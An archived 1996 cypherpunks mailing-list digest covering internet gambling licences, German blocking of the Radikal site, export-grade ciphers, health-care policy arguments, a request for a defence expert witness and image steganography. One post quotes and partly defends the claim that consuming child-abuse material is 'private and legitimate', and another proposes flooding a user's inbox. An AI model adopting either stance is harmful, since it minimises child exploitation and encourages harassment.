.oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From jk at stallion.ee Tue Sep 17 08:07:03 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Tue, 17 Sep 1996 23:07:03 +0800 Subject: no internet gambling Message-ID: >From today's Baltic News Service newswire (my free translation): According to the ministry of finance of Estonia, they will not give any licences or permission to organize Internet gambling or lotteries in Estonia. The reason given was, that arranging lotteries on the Internet would take the activity outside from Estonia. According to the news, the only Internet gambling licences given out are in Liechtenstein and Ahvenamaa (part of Finland). My question is: how easy it is to get a licence for Internet casino in either Liechtenstein or some off-shore country (Belize, Bahamas etc) ? I believe Belize was one of the first to sign legislation on Internet gambling, does anyone have more information about the costs and requirements? Jüri Kaljundi AS Stallion jk at stallion.ee From felipe at xs4all.nl Tue Sep 17 08:12:17 1996 From: felipe at xs4all.nl (Felipe Rodriquez) Date: Tue, 17 Sep 1996 23:12:17 +0800 Subject: German providers continue to censor XS4ALL network Message-ID: <199609170958.LAA04976@xs1.xs4all.nl> Released by: XS4ALL Internet BV Date : 17-september-1996 Author : Felipe Rodriquez (felipe at xs4all.nl) *** PRESS RELEASE *** GERMAN PROVIDERS CONTINUE TO CENSOR XS4ALL NETWORK German providers have continued their ip-filtering actions against dutch provider XS4ALL. These ip-filtering actions were started after the German Authorities ordered the providers to block access to a specific document on the XS4ALL website. The document is not illegal in Holland, and is the property of one of XS4ALL's customers.
So far German authorities have not contacted XS4ALL, no official requests were made to remove these documents from our server. Xs4all customers are prevented from communicating with German Internet users, because Email is not passed through a number of German internet routers. Xs4all customers are prevented from accessing German websites. Therefore German providers, particularly EUnet Germany GmbH, are violating article 10 of European Convention on Human Rights: "Everyone has the right to freedom of expression. This right shall include freedom to hold opinions and to receive and impart information and ideas without interference by public authority and regardless of frontiers." They are preventing our Xs4all subscribers to execute their rights of free expression. Some of our customers have terminated their account at Xs4all, because of these restrictions, that were imposed by German providers, after an order from the German government. These restrictions have caused a major disruption on the business interests of XS4ALL Internet BV. From pgut001 at cs.auckland.ac.nz Tue Sep 17 09:21:00 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Wed, 18 Sep 1996 00:21:00 +0800 Subject: [Long] A history of Netscape/MSIE problems Message-ID: <84296097823886@cs26.cs.auckland.ac.nz> In case anyone's interested, I've finally found the source I used for the claim that RC2/RC4 were exportable if the details were kept quiet: "Details about them [RC2 and RC4] have not been published (including by patenting) in order to maintain their special export status". -- RSA FAQ, version 1.0, draft 1e, 14 September 1992, p.40. This makes sense - the NSA wouldn't want the details published to stop non-US non-crippled versions appearing, and I can't really imagine RSADSI voluntarily not patenting a new algorithm. Peter.
From tank at xs4all.nl Tue Sep 17 09:49:41 1996 From: tank at xs4all.nl (tank) Date: Wed, 18 Sep 1996 00:49:41 +0800 Subject: radikal update 17-9-1996 Message-ID: <199609171032.MAA05213@xs2.xs4all.nl> URL of the main radikal-site has changed: ********************************* * http://www.xs4all.nl/~radikal * ********************************* We need more mirrors to stop Germany censoring the radikal and the internet. As you can see, free speech is not a gift, but something you have to fight for. Join the struggle ! If you got a mirror up and running let it know. Send your url to: tank at xs4all.nl *********************************************************************** ** Radikal Mirrors ** ** *********************************************************************** Receive Radikal 154 by email: Send an empty message to radikal at xs4all.nl and you receive issue 154 by mail. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Read the radikal by calling the Netherlands (25 numbers). All telefonnr. are listed at the end of this mail.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Download the radikal archive: http: http://www.xs4all.nl/~bslash/radikal.tar.gz Radikal-site unix http://www.xs4all.nl/~bslash/radi.zip Radikal-site dos-zip archive ftp: ftp://utopia.hacktic.nl/pub/replay/pub/incoming Radikal 154 in plaintext ASCII http://www.xs4all.nl/~radikal/radi154.tgz Radikal 154 unix http://www.xs4all.nl/~radikal/radi154.zip Radikal 154 dos-zip If you got your mirror up and running let us know +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Special mirror: de.soc.zensur de.org.politik.spd http://www.altavista.digital.com usenet-search for radikal.zip +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Radikal-sites: 1.http://www.xs4all.nl/~radikal 2.http://burn.ucsd.edu/%7Eats/RADIKAL/ Arm the Spirit statement "Radikal Mirror Site At ATS WWW Page" 3.http://www.jca.or.jp/~taratta/mirror/radikal/ 4.http://www.serve.com/~spg/ 5.http://huizen.dds.nl/~radikal 6.http://www.canucksoup.net/radikal/index.html 7.http://www.ecn.org/radikal 8.http://www.well.com/~declan/mirrors/ 9.http://www.connix.com/~harry/radikal/index.htm 10.http://www.ganesa.com/radikal/ 11.http://www.denhaag.org/~radikal 12.http://www.knooppunt.be/~daniel/radikal 13.http://emma.unm.edu/radikal 14.http://www.tacacs.com/radikal/" 15.http://www.dsvenlo.nl/~vvd/radikal/ 16.http://www.why.net/home/static/radi 17.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 18.http://www.xs4all.nl/~jeroenw/radikal/ 19.http://home.ipr.nl/~radikal/ 20.http://www.dreamy.demon.co.uk/occam/ 21.http://www.ibmpcug.co.uk/~irdial/live_free/ 22.http://zero.tolerance.org/radi/index.htm 23.http://www.meaning.com/library/radikal/ 24.http://www.xs4all.nl/~irmed/radikal/ 25.http://www.walli.uwasa.fi/~tviemero/radikal 26.http://www.sko.it/~sfede/radi/index.htm 27.http://www.bart.nl/~sz/index.html 28.http://bellp.med.yale.edu/index.htm 29.http://www.euronet.nl/users/funest/radi/index.htm 
30.http://fine.com/~rsr/radikal 31.http://www.lab.net/radikal 32.http://www.charm.net/~gbarren/radikal 33.http://login.datashopper.dk/~pethern/radikal/ 34.http://www.interlaw.com 35.http://hyperreal.com/~rich/radikal/index.html 36.http://www.citinv.it/iniziative/info/radikal/ Phone: Call and login as "new". So first dail the international number +31 (hollands international code) and than one of these numbers. Amsterdam Zoetermeer Maarssen 020 5350535, V.34 079 3611011, V.34 0346 550455, V.34 020 4223422, UUCP 079 3600800, ISDN PPP 0346 553613, ISDN PPP 020 6265060, ZyXEL 079 3630569, ISDN X.75 0346 555285, ISDN X.75 020 4229700, ISDN PPP 020 4206782, ISDN X.75 Hoorn Geleen Leeuwarden 0229 212177, V.34 046 4789478, V.34 058 2157815, V.34 0229 219717, ISDN PPP 046 4230555, ISDN PPP 058 2130910, ISDN PPP Goes Assen 0113 252900, V.34 0592 331531, V.34 0113 270110, ISDN PPP 0592 331278, ISDN PPP Willemstad Deurne 0168 472472, V.34 0493 323344, V.34 0168 476472, ISDN PPP 0493 351566, ISDN PPP From perry at piermont.com Tue Sep 17 10:23:15 1996 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 18 Sep 1996 01:23:15 +0800 Subject: Spam blacklist project In-Reply-To: <9609170603.AA03193@etna.ai.mit.edu> Message-ID: <199609171356.JAA27539@jekyll.piermont.com> hallam at ai.mit.edu writes: > Well if some people find it amazing that there are people out there > who agree with the 98.8% of people who did not vote Libertarian at the > last election then so be it. Most people in this country also think that Cheez Whiz is food, Philllll. Perry From dustman at athensnet.com Tue Sep 17 10:42:26 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Wed, 18 Sep 1996 01:42:26 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609171255.IAA00172@godzilla.athensnet.com> jbugden at smtplink.alis.ca wrote: >> By spreading the risk you minimize the cost. 
<...> >Canada has a single payer system Translation: a more palatable term for "socialised medicine" >and we spend about two thirds as much as the >U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians >while about 35% of people in the U.S. have *no* health insurance. So why in the world do those crazy Canadians keep coming here for medical care, when they can get it from your compassionate bureaucrats? What could be their compulsion to spend money they don't need to spend? Charitable impulses toward our impoverished medical profession? BTW, looking at historical costs of medical care and the level of government involvement, it is safe to say that the US has too much socialism in our medical system right now, and that it what's making the best system (ours) so expensive when it would not be otherwise. >Yes, the insurance premium is not optional. True. >Yes, it *is* cheaper. *False.* It is cheaper for _SOME_, and more expensive for others (in terms of either money, or waiting with pain, or both) and has an _ultimately high cost [the death penalty] for still others, who are forced to wait for the "compassionate" bureaucrats [who naturally know more about what patients' bodies need than the patients do themselves] to give them permission to get medical care they would otherwise purchase before death. From attila at primenet.com Tue Sep 17 11:24:03 1996 From: attila at primenet.com (attila) Date: Wed, 18 Sep 1996 02:24:03 +0800 Subject: IBM_gak In-Reply-To: Message-ID: <199609171425.IAA10655@InfoWest.COM> In , on 09/17/96 at 01:13 AM, Black Unicorn said: = .On Mon, 16 Sep 1996, Dr.Dimitri Vulis KOTM wrote: = .> = .> Apparently, senile Tim May (fart) is a Clinton administration troll planted = .> here to sabotage any discussions of actual crypto work and to flood this = .> mailing list with lies and personal attacks and to make it unusable. 
= .> = .If so, it would seem you fell for it and failed to resist the temptation = .to type the word "fart" out- yet again. and here I took the trouble to take Dr. Dimitri off the kill list; dang! time wasted again; back he goes to [filter...] > /dev/null. Isn't procmail a nice toy?!? -- Dr. Dimitri is like diapers. They both need changing regularly, and for the same reason. From proff at suburbia.net Tue Sep 17 11:53:08 1996 From: proff at suburbia.net (Julian Assange) Date: Wed, 18 Sep 1996 02:53:08 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant In-Reply-To: <199609170703.RAA21552@mac.ce.com.au> Message-ID: <199609171531.BAA22478@suburbia.net> > And what am I paying for...to protect the status quo. I believe that > there is more than enough help for ppl available. They just need to > get off their butts and work. Do we really need your amatuer political views? -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. 
Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From mthompso at qualcomm.com Tue Sep 17 12:28:50 1996 From: mthompso at qualcomm.com (Michelle Thompson) Date: Wed, 18 Sep 1996 03:28:50 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <2.2.32.19960917161601.002ee52c@strange.qualcomm.com> >From: kwheeler at intellinet.com >Date: Tue, 17 Sep 1996 10:54:35 -0500 >X-Sender: kwheeler at intellinet.com >To: Michelle Thompson >Subject: Re: Assassination Politics, was Kiddie porn on the Internet Interesting information from a friend of mine- >An american can not serve for pay for a position in another military >that could be filled by local populace. I may have my jurisdiction >wrong tho, this could be an international law not a US law. >Basically, you can't go be a grunt or an assasin in another country, >because they can find their own, but one can, however, fly P-40 Warhawks for >China in 1941 because there were no chinese planes/pilots. Guys from soldier >of fortune (tho they do volunteer work) could be hired as 'experts' at >whatever, removing mines, etc... It's very touchy. But, the worst thing about >it all, is that the geneva convention doesn't protect mercenaries....so awful >things could be done to them, and the world wouldn't see that as war crimes. > >-Keith I believe that with the breakdown of the traditional sense of sovereignty, mercenary activity, whether military or commercial in nature, will increase. Engineering seems to be quite mercenary already, and very international. Marketing and advertising, to a novice (me), seem to be going the same way. 
Hence my interest in cryptography. Data security is essential in international engineering projects. Michelle Thompson From jbugden at smtplink.alis.ca Tue Sep 17 12:36:53 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Wed, 18 Sep 1996 03:36:53 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... Message-ID: <9608178429.AA842985398@smtplink.alis.ca> Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political rant) Black Unicorn >On Mon, 16 Sep 1996 jbugden at smtplink.alis.ca wrote: >> Specifically, that anyone can "save for a rainy day" and still not be >> able to provide for events that can always happen: Heart attack, >> stroke, car accident, pinched nerve that leaves you in excruciating >> pain and unable to work for several years. > >Understand what it is you are saying. > >You are saying that everyone on the planet has a right to health > insurance and disability insurance whether they can afford it or not. > This is folly. The result is serious moral hazard problems. Almost, but not quite. I'm saying that within our two countries at least (Canada, U.S.) everyone could have access to medically necessary procedures because the *society as a whole* can afford it. I understand moral hazard and risk pool separation. I also understand that the insurance bureaucracy required to manage much of the U.S. health care system absorbs much of the money going into the system. Managing risk pool separation proves to be expensive, or perhaps just very profitable. > Social safety nets prevent rioting by the lower classes, revolution and > general civil disorder because they appease the masses. Indeed this > is a form of health and life insurance for the middle and upper classes. Absolutely. And it is a scheme that many of the lower classes pay into. Since it is to our mutual benefit (yours and mine), I choose not to complain about it. > Spreading the risk, by itself, does NOT reduce cost. > You must properly PRICE risk.
Agreed. But there is a balance between accurately pricing the risk and minimizing the cost of the bureacracy that polices this pricing. There are also many ways to modify behaviour, not all of them direct. We only need a correlation here, not causation. For example, high taxes on smoking and drinking or spot checks for drunk driving. All of these correlate with a reduction in high risk behaviour and a reduction in health costs. Yes, there are people who will engage in high risk behaviour. Yes, they will still receive treatment. No, it is not worth tracking down all of these people. You may also get better privacy because no insurance company is collecting personal data in order to minimize their risk. A Suspicious Persons List is only one manifestation of this type of intrusion. This privacy issue may only increase as genetic screening becomes widespread. There is much potential for moral hazard when the PRICE for your insurance is affected by the accuracy of your disclosure. How will they ever know... Fact: Canada spends less than the U.S. per capita on health care, while covering more people in percentage terms. Ciao, James, qui pete les bretelles du Canada. And he brought the present unto Eglon king of Moab: and Eglon was a very fat man. [Judges 3:17] "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies. The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ "A foolish consistency is the hobgoblin of little minds." - Emerson From paul at fatmans.demon.co.uk Tue Sep 17 12:52:05 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 03:52:05 +0800 Subject: Workers Paradise. /Political rant. 
Message-ID: <842976189.23679.0@fatmans.demon.co.uk> > tcmay at got.net (Timothy C. May) writes: > > Crypto Anarchy means getting rid of deadwood the old-fashioned way. > > Starting with the lying old fart himself. The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ along the following lines: Q> What do it do when I join the list? A> Killfile *@bwalk.dm.net Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From snow at smoke.suba.com Tue Sep 17 14:08:42 1996 From: snow at smoke.suba.com (snow) Date: Wed, 18 Sep 1996 05:08:42 +0800 Subject: did you go to school? In-Reply-To: <32399315.19E7@precipice.v-site.net> Message-ID: On Fri, 13 Sep 1996, HipCrime wrote: > >> THIN SLICES CUT FROM OUR PRECIOUS FORESTS. > > "OUR?" Since when did my trees become partially yours?
> > JMR > JMR, it's hard to believe that your English education is SO LACKING, > that you missed the fact, that in my sentence quoted above, the word > "ours" refers to MANKIND IN GENERAL, not me personally. > Go sit in the corner with the duncecap on, and don't come out until you > can read an 8th grade piece of literature (with full comprehension). It's no wonder you're homeless. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From Adamsc at io-online.com Tue Sep 17 14:29:38 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 05:29:38 +0800 Subject: 10 minute delay considered inconsequential Message-ID: <19960917171059750.AAA156@IO-ONLINE.COM> On Wed, 11 Sep 1996 22:50:22 -0700, Timothy C. May wrote: >>I've always wondered if the makers of mailer software couldn't include a delay >>option, so that, say, a message might be held for 10 minutes and then sent. >>Imagine how many of the "Sorry about x; I meant y" posts we'd never see. > >I expect there would be little effect. I suspect most of us write articles, >send them out, and only notice the mistakes, typos, whatever when they are >pointed out. True. I guess what we need is an AI mailer that would do something like "Message #324 is rather confusing - did you really mean x?". Oh well. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." 
-- Duncan Frissell From declan at well.com Tue Sep 17 14:31:08 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 18 Sep 1996 05:31:08 +0800 Subject: Child pornography -- Expert witness for Federal jury trial Message-ID: Folks, I just got a call from two Federal Public Defenders whose client is charged with possession of child pornography stored in the /tmp directory of a Unix system, in a zip'd file. (These lawyers seem to be reasonably cyber-savvy, and told me they're following what I've been writing about cyber-liberties.) There's evidence saying that other people were using the account at that time, and the attorneys have the relevant wtmp/utmp files. There's also no evidence saying an actual child was exploited -- given the nature of the images, they may have been morphed. I don't think the defendant is accused of *making* them; he's only accused of *possessing* them. The case goes to jury trial soon in a Federal District Court. If anyone is interested in testifying as an expert witness in this case about Unix tech foo (and is qualified to do so), please let me know and I'll pass along your info. I believe at least your expenses would be paid. Here's an opportunity to ensure justice is done and not just rant in cyberspace... :) -Declan (Note I have no idea if the guy is indeed guilty of possessing JPGs the government has banned. What I do know is that any defendant deserves a fair trial and the government must prove that he's guilty of the crimes for which he's charged. And if anyone does molest a child, I say lock 'em up for a good long time.) From zachb at netcom.com Tue Sep 17 14:50:46 1996 From: zachb at netcom.com (Z.B.) Date: Wed, 18 Sep 1996 05:50:46 +0800 Subject: Workers Paradise. /Political rant. 
In-Reply-To: <842976189.23679.0@fatmans.demon.co.uk> Message-ID: On Mon, 16 Sep 1996 paul at fatmans.demon.co.uk wrote: > > > The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ > along the following lines: > > Q> What do it do when I join the list? > A> Killfile *@bwalk.dm.net > How about we go just a little farther than that and set up Procmail to bounce all of his messages back to him? I'd hate to see his inbox if enough of us started doing that! > > Datacomms Technologies web authoring and data security > Paul Bradley, Paul at fatmans.demon.co.uk > Http://www.fatmans.demon.co.uk/crypt/ > "Don`t forget to mount a scratch monkey" > --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From Adamsc at io-online.com Tue Sep 17 14:51:27 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 05:51:27 +0800 Subject: common sense Message-ID: <19960917173913750.AAA74@IO-ONLINE.COM> On Thu, 12 Sep 1996 16:04:14 -0700, HipCrime wrote: >> And rather than "dispensing drugs in clinics," why not simply >> scrap the drug laws entirely? People have a *right* to do as >> they please with their bodies. >Let's hear it for common sense. It's the first decent posting I've >seen to this list. Tell me, how do you walk with that huge chip on your shoulder? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From paul at fatmans.demon.co.uk Tue Sep 17 14:52:47 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 05:52:47 +0800 Subject: CU foward post, netcopped again! 
Message-ID: <842976184.23597.0@fatmans.demon.co.uk> > >what is being punished here is not the exploitation of children, which is > > wrong and must be prevented, but the private thoughts of those who > > produce and recieve this material, which are totally private and > > legitimate. > > There is nothing "legitimate" about fucking children, fantasising about > fucking children, or looking at pictures of people fucking children. > > The dangers of this debate are all too apparent, and if this sort of > quote were to reach the tabloid audience I hardly think it would be a > positive contribution to the image of CommUnity... Oh no! - I`ve been netcopped on the CommUnity list *AGAIN*, long live cypherpunks, the last bastion of free speech on the net!!!! ;-) But seriously, this does highlight what we are up against, when CommUnity (for US readers CommUnity, abreviated CU sometimes, is like a UK version of the EFF), supposedly a free speech and online liberties organisation, has posters (and this one is pretty typical) like this which clearly cover all debate on a subject area as "padophilia" if they try to explore the issues any more deeply than saying that fucking children is wrong... 
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From unicorn at schloss.li Tue Sep 17 15:02:44 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 06:02:44 +0800 Subject: no internet gambling In-Reply-To: Message-ID: On Tue, 17 Sep 1996, [ISO-8859-1] Jüri Kaljundi wrote: > > From todays Baltic News Service newswire (my free translation): > > According to the ministry of finance of Estonia, they will not give any > licences or permission to organize Internet gambling or lotteries in > Estonia. > > The reason given was, that arranging lotteries on the Internet would take > the activity outside from Estonia. According to the news, the only > Internet gambling licences given out are in Liechtenstein and Ahvenamaa > (part of Finland). > > My question is: how easy it is to get a licence for Internet casino in > either Liechtenstein Tere. Rather difficult.
> or some off-shore country (Belize, Bahamas etc) ? I'm not sure about these others. > Jüri Kaljundi > AS Stallion > jk at stallion.ee -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From Adamsc at io-online.com Tue Sep 17 15:11:45 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:11:45 +0800 Subject: really undetectable crypto Message-ID: <19960917174627828.AAA205@IO-ONLINE.COM> On Thu, 12 Sep 96 19:26:56 -0700, Jim Miller wrote: >Most everybody on the list is familiar with the technique of hiding >encrypted messages in the LSBs of image files. Personally, I would not >use such a technique because I don't believe it's really undetectable. I >assume, without proof, that the LSBs of image files have statistical >properties that are sufficiently different from encrypted data that a >clever person could determine whether or not an image file contained an >imbedded encrypted message. Actually, if you use only a few bits - and not, say, bit 15 of *every* pixel - you can feel secure *IF* you are writing truly encrypted data. A regular PGP message has a bunch of header material that most certainly is not random-looking. OTOH, if you only write the raw data, then there is no way to differentiate from the random noise added by any scanner - in most cases, the last couple bits in each RGB triplet of a truecolor image are random. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From mab at research.att.com Tue Sep 17 15:18:32 1996 From: mab at research.att.com (Matt Blaze) Date: Wed, 18 Sep 1996 06:18:32 +0800 Subject: DIMACS Trust management workshop, Sept 30 - Oct 2.
Message-ID: <199609171605.MAA24438@nsa.research.att.com> ------- Forwarded Message Received: from amontillado.research.att.com (amontillado.research.att.com [135.205.42.32]) by nsa.research.att.com (8.7.3/8.7.3) with ESMTP id LAA24206 for ; Tue, 17 Sep 1996 11:52:51 -0400 (EDT) Received: from research.research.att.com (research.research.att.com [135.205.32.20]) by amontillado.research.att.com (8.7.5/8.7) with SMTP id LAA14378 for ; Tue, 17 Sep 1996 11:52:30 -0400 (EDT) Received: from ns.research.att.com by research; Tue Sep 17 11:48:17 EDT 1996 Received: from henson.rutgers.edu by ns; Tue Sep 17 11:06:01 EDT 1996 Received: (from bquigley at localhost) by henson.rutgers.edu (8.6.12+bestmx+oldruq+newsunq+grosshack/8.6.12) id LAA26298; Tue, 17 Sep 1996 11:02:41 -0400 Date: Tue, 17 Sep 1996 11:02:41 -0400 From: Barbara Quigley Message-Id: <199609171502.LAA26298 at henson.rutgers.edu> To: dimacs-members at dimacs.rutgers.edu, local-list at dimacs.rutgers.edu, dimacs-dimacs at dimacs.rutgers.edu, dimacs-current-postdocs-industry at dimacs.rutgers.edu, dimacs-current-postdocs-univ at dimacs.rutgers.edu, dimacs-current-visitors at dimacs.rutgers.edu, rutgers-list at dimacs.rutgers.edu, theorynt at vm1.nodak.edu, finite-model-theory at informatik.rwth-aachen.de Subject: DIMACS Workshop on Trust Management in Networks, Rutgers University, September 30 - October 2, 1996 DIMACS Workshop on Trust Management in Networks September 30 - October 2, 1996 DIMACS, Rutgers University - ---------------------------------------------------------------------------- Organizers: Ernie Brickell brickell at btec.com Joan Feigenbaum jf at research.att.com David Maher dpm at allegra.att.com Theme: The use of public-key cryptography on a mass-market scale requires sophisticated mechanisms for managing trust. 
For example, any application that receives a signed request for action is forced to answer the central question ``Is the key used to sign this request authorized to take this action?'' In certain applications, this question reduces to ``Does this key belong to this person?'' In others, the authorization question is considerably more complicated, and resolving it requires techniques for formulating security policies and security credentials, determining whether particular sets of credentials satisfy the relevant policies, and deferring trust to third parties. This workshop covers all aspects of the trust management problem. Relevant topics include but are not limited to: * General approaches to trust management * Languages, systems, and tools * Certificates and public-key infrastructure * Formal models and analysis * Trust management in specific application domains; including but not limited to: o Banking o E-mail o Internet commerce o Licensing o Medical information systems o Mobile programs and ``code signing'' o Revocation of cryptographic keys For more information: Information about local arrangements, travel, lodging and registration can be found at http://dimacs.rutgers.edu/Workshops/Management. Those without WWW access can contact Pat Pravato at 908-445-5929 or pravato at dimacs.rutgers.edu. This workshop is part of DIMACS Special Year on Networks. Information about the Special Year on Networks can be found at DIMACS WWW site: http://dimacs.rutgers.edu or by contacting the center. __________________ Program: Monday, September 30, 1996 8:15 Continental breakfast 9:00 Welcome to DIMACS Fred Roberts, DIMACS Director 9:15 What is "Trust Management," and what are the Workshop Goals? Joan Feigenbaum, AT&T Laboratories 9:45 Let a Thousand (Ten Thousand?) CAs Reign Stephen Kent, BBN Corporation 10:45 Break 11:00 The PolicyMaker Approach to Trust Management Matt Blaze, AT&T Laboratories (Joint work with J. Feigenbaum and J. 
Lacy) 12:00 Lunch 1:15 SDSI: A Simple Distributed Security Infrastructure Butler Lampson, Microsoft (Joint work with R. Rivest) 2:15 SPKI Certificates Carl Ellison, Cybercash 3:15 Break 3:45 Panel Discussion Moderator: David Maher, AT&T Laboratories Panelists: Blaze, Ellison, Kent, and Lampson 5:30 Wine and cheese Tuesday, October 1, 1996 8:15 Continental Breakfast 9:00 Using PICS Labels for Trust Management Rohit Khare, World Wide Web Consortium 9:30 Managing Trust in an Information-Labeling System Martin Strauss, Iowa State University (Joint work with M. Blaze, J. Feigenbaum, and P. Resnick) 10:00 Trust Management in Web Browsers, Present and Future Ed Felten, Princeton University (Joint work with D. Dean and D. Wallach) 10:30 Break 10:45 IBM Cryptolopes, SuperDistribution, and Digital Rights Management Marc A. Kaplan, IBM Watson Research Center 11:15 Requirements and Approaches for Electronic Licenses David Maher, AT&T Laboratories 11:45 PathServer Michael Reiter, AT&T Laboratories (Joint work with S. Stubblebine) 12:15 Lunch 1:30 Inferno Security David Presotto, Bell Labs -- Lucent Technologies 2:00 Transparent Internet E-mail Security Raph Levien, University of Calfornia at Berkeley (Joint work with L. McCarthy and M. Blaze) 2:30 Secure Digital Names Stuart Haber, Bellcore (Joint work with S. Stornetta) 3:00 Break 3:30 Untrusted Third Parties: Key Management for the Prudent Mark Lomas, Cambridge University (Joint work with B. Crispo) 4:00 Distributed Trust Management using Databases Trevor Jim, University of Pennsylvania (Joint work with C. Gunter) 4:30 Distributed Commerce Transactions: Structuring Multi-Party Exchanges into Pair-wise Exchanges Steven Ketchpel, Stanford University (Joint work with H. Garcia-Molina) Wednesday, October 2, 1996 8:15 Continental Breakfast 9:00 Policy-Controlled Cryptographic Key Release David McGrew, Trusted Information Systems, Inc. (Joint work with D. 
Branstad)
9:45 An X.509v3-based Public-Key Infrastructure for the Federal Government
      William Burr, Nat'l. Inst. of Standards and Technology
10:15 Break
10:30 The ICE-TEL Public-Key Infrastructure and Trust Model
      David Chadwick, Salford University
11:00 A Distributed Trust Model
      Alfarez Abdul-Rahman, University College, London (Joint work with S. Hailes)
11:30 On Multiple Statements from Trust Sources
      Raphael Yahalom, Hebrew University and MIT
12:00 Lunch
1:00 Off-line Delegation in a Distributed File Repository
      Arne Helme, University of Twente (Joint work with T. Stabell-Kul)
1:30 Operational Tradeoffs of Aggregating Attributes in Digital Certificates
      Ian Simpson, Carnegie Mellon University
2:00 Trust Management for Mobile Agents
      Vipin Swarup, Mitre (Joint work with W. Farmer and J. Guttman)
2:30 Break
3:00 Trust Management in ERLink
      Samuel Schaen, Mitre
3:30 Linking Trust with Network Reliability
      Y. Desmedt, University of Wisconsin at Milwaukee (Joint work with M. Burmester)
4:00 Trust Management Under Law-Governed Interaction
      Naftaly Minsky, Rutgers University (Joint work with V. Ungureanu)
4:30 Tools for Security Policy Definition and Implementation
      Polar Humenn, Blackwatch Technology, Inc.

------- End of Forwarded Message

From unicorn at schloss.li Tue Sep 17 15:20:17 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Wed, 18 Sep 1996 06:20:17 +0800
Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica...
In-Reply-To: <9608178429.AA842985398@smtplink.alis.ca>
Message-ID:

On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote:

> Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political rant)
>
> Black Unicorn
> >On Mon, 16 Sep 1996 jbugden at smtplink.alis.ca wrote:
> >> Specifically, that anyone can "save for a rainy day" and still not be
> >> able to provide for events that can always happen: Heart attack,
> >> stroke, car accident, pinched nerve that leaves you in excruciating
> >> pain and unable to work for several years.
> >
> >Understand what it is you are saying.
> >
> >You are saying that everyone on the planet has a right to health
> > insurance and disability insurance whether they can afford it or not.
> > This is folly. The result is serious moral hazard problems.
>
> Almost, but not quite. I'm saying that within our two countries at least
> (Canada, U.S.) everyone could have access to medically necessary procedures
> because the *society as a whole* can afford it.

Your statement above is a loaded gun. The decisions about what is or is not medically necessary must by design be made by government in a socialized medicine regime. If I need to get in to why, it is because you don't understand socialized medicine as well as you think you do.

